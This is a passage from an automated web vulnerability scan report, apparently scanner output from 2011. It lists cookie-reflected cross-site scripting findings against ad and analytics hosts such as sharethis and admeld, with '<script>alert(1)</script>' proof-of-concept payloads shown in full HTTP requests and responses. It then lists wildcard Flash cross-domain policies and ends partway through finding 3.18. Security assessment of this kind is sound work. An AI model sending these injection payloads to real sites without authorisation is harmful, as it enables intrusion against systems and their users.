Host: hits.nextstat.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webStat_108645=da8aee5f04e7ebdfbf66e7f2c334e7d5de83d<script>alert(1)</script>25380d542c7; webStat_108645_mv=da8aee5f04e7ebdfbf66e7f2c334e7d5

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:55 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.10
Cache-Control: private
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: webStat_108645_last=6c0c2cc469f86170c8aa98036158dc8b; path=/; domain=.nextstat.com
Set-Cookie: webStat_108645_lastvisit=12+May+2011+06%3A33%3A55; expires=Sun, 09-May-21 13:33:55 GMT; path=/; domain=.nextstat.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1718
Connection: close
Content-Type: image/png

.PNG
.
...IHDR...x.........|.k.....PLTE.............yIDAT..c`..0.`.o`..`."....e.,....
.0.0....p>7.o.P...0H....?@|..a ....H.0(..w...@...........p>#.....o@.....`>...@........oU-*..8-....IEND.B`.</td
...[SNIP]...
</b> Invalid SQL:
       insert into 108645visitor set
visitorID        = 'da8aee5f04e7ebdfbf66e7f2c334e7d5de83d<script>alert(1)</script>25380d542c7',
entryTimestamp    = '20110512063355',
exitTimestamp    = '20110512063355',
masterVisitorID = 'da8aee5f04e7ebdfbf66e7f2c334e7d5',
browserID
...[SNIP]...

2.153. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload d8e89<script>alert(1)</script>2569e9647a5 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F&jsref=&rnd=1305206987383 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==d8e89<script>alert(1)</script>2569e9647a5; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Thu, 12 May 2011 13:31:36 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==d8e89<script>alert(1)</script>2569e9647a5
userid:
</div>
...[SNIP]...

2.154. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/489/businesstech/300x250/businesstech_btf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2036f"><script>alert(1)</script>d28f2b3e28b was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb92036f"><script>alert(1)</script>d28f2b3e28b; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1890
Content-Type: text/html
Date: Thu, 12 May 2011 13:28:31 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb92036f"><script>alert(1)</script>d28f2b3e28b&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

2.155. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/489/businesstech/300x250/businesstech_btf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d56ba"><script>alert(1)</script>6c1cec4228b was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9d56ba"><script>alert(1)</script>6c1cec4228b; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1890
Content-Type: text/html
Date: Thu, 12 May 2011 13:28:31 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
<script type="text/javascript" src="http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9d56ba"><script>alert(1)</script>6c1cec4228b&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

2.156. http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm [jsc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://urbanlegends.about.com
Path:   /b/2011/05/10/poll-superstitious-about-friday-the-13th.htm

Issue detail

The value of the jsc cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31165(a)e43f635586d was submitted in the jsc cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b/2011/05/10/poll-superstitious-about-friday-the-13th.htm HTTP/1.1
Host: urbanlegends.about.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMog=B5312m3f20kA052n; zFD=B5310B50110B00101; jsc=1331165(a)e43f635586d

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:25 GMT
Server: Apache
Vary: *
PRAGMA: no-cache
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=-3600
Expires: Thu, 12 May 2011 12:32:25 GMT
Content-Type: text/html
Content-Length: 27132

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<meta name="docset" content="6"><meta http-equiv="Set-Cookie" content="Mint=B5CDWP23
...[SNIP]...
='0'
zOr='B5CDWP2320kA0Y2d';zTbO=zRQO=1;zp0=zp1=zp2=zp3=zfs=0;zDc=1;
zSm=zSu=zhc=zpb=zgs=zdn='';zFS='B5C10B50110B00101';zFD='B5C1B5310B50220B00202'
zDO=zis=1;zpid=zi=zRf=ztp=zpo=0;zdx=20;zfx=100;zJs=1331165(a)e43f635586d;
zi=1;zz=';336280=2-1-1299;72890=2-1-1299;336155=2-1-12-1;93048=2-1-12-1;30050=2-1-12-1';zx='3-1-1399';zde=15;zdp=1440;zds=1440;zfp=0;zfs=66;zfd=100;zdd=20;zaX=new Array(11, new Array(100,504,8198,1,'
...[SNIP]...

3. Flash cross-domain policy  previous  next
There are 38 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://a.tribalfusion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.2. http://ad-emea.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 18:22:36 GMT
Date: Thu, 12 May 2011 13:27:56 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.3. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Thu, 12 May 2011 13:28:00 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.4. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Thu, 12 May 2011 20:54:55 GMT
Date: Wed, 11 May 2011 20:54:55 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 59612

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.5. http://altfarm.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Thu, 12 May 2011 13:28:15 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.6. http://ar.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:17 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.7. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 13:27:54 GMT
Date: Thu, 12 May 2011 13:27:54 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

3.8. http://b.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 13:30:29 GMT
Date: Thu, 12 May 2011 13:30:29 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

3.9. http://bs.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 13:28:00 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


3.10. http://cdn.eyewonder.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.eyewonder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.eyewonder.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=18000
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "b2ae8e693141c91:13a0"
Server: Microsoft-IIS/6.0
p3p: policyref="/100125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
Age: 11611
Date: Thu, 12 May 2011 13:30:36 GMT
Last-Modified: Fri, 07 Nov 2008 23:34:43 GMT
Expires: Thu, 12 May 2011 15:17:05 GMT
Content-Length: 195
Connection: close

<?xml version="1.0"?>
<!-- http://cdn.eyewonder.com-->
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

3.11. http://cdn.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Length: 355
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 14:23:28 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
x-server: web101
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Thu, 12 May 2011 13:27:59 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

3.12. http://core.insightexpressai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: core.insightexpressai.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 02 Feb 2010 21:21:42 GMT
ETag: "0f7cfb64da4ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 13:30:22 GMT
Content-Length: 139
Connection: close
Set-Cookie: DW=68c7671305207022; expires=Wed, 07-May-2031 13:30:22 GMT; path=/; domain=insightexpressai.com
Cache-Control: no-store

<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

3.13. http://ds.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Thu, 12 May 2011 13:28:02 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


3.14. http://feeds.delicious.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.delicious.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.delicious.com

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:29:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 10 May 2011 23:41:14 GMT
Accept-Ranges: bytes
Content-Length: 202
Content-Type: application/xml
Age: 0
Server: YTS/1.19.4

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.15. http://gscounters.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2a7f"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web201
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 13:28:12 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

3.16. http://js.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Thu, 12 May 2011 13:28:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.17. http://mashable.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mashable.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mashable.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 18 Mar 2009 21:45:51 GMT
ETag: "a01237-d8-4656b9b76c1c0"
Cache-Control: max-age=900, public, must-revalidate, proxy-revalidate
Content-Type: text/xml
Content-Length: 216
Vary: Accept-Encoding
X-Cacheable: Yes
Date: Thu, 12 May 2011 13:28:26 GMT
Connection: close
X-Served-By: 261656-web3
X-Cache-Hits: 0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-
...[SNIP]...

3.18. http://ping.crowdscience.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ping.crowdscience.com
